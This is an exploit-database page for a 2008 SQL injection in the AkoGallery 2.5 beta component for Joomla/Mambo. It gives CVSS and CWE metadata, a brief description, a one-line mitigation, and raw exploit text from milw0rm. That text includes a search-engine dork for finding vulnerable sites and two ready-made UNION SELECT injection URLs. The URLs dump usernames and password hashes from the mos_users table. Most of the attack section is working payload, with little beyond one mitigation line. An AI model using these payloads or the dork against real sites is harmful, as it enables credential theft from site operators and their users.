header-logo
Suggest Exploit
vendor:
AkoGallery
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AkoGallery
Affected Version From: 2.5 beta
Affected Version To: 2.5 beta
Patch Exists: YES
Related CWE: N/A
CPE: a:mamboportal:akogallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla SQL Injection (com_akogallery)

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'id' of the 'index.php' script. This can be used to extract data from the database, modify data, delete data, or even execute commands on the operating system.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#########################################################################
#
#
#  joomla SQL Injection(com_akogallery)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_akogallery"
#
########################################################################
EXPLOIT :

index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*

index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*

#########################################################################
# S@BUN                   www.hackturkiye.com                        S@BUN
#########################################################################
# S@BUN                         GOOD LUCKY                              S@BUN
#########################################################################

  <name>akogallery</name>
  <creationDate>21.06.2004</creationDate>
  <author>Arthur Konze</author>
  <copyright>Copyright 2003, 2004 by Arthur Konze. Distribution prohibited!</copyright>
  <authorEmail>webmaster@mamboportal.com</authorEmail>

  <authorUrl>www.mamboportal.com</authorUrl>
  <version>2.5 beta</version>
  <description>AkoGallery is a fully integrated Mambo picture gallery component.</description>

# milw0rm.com [2008-01-31]

Navigation

Suggest Exploit

Services By CQR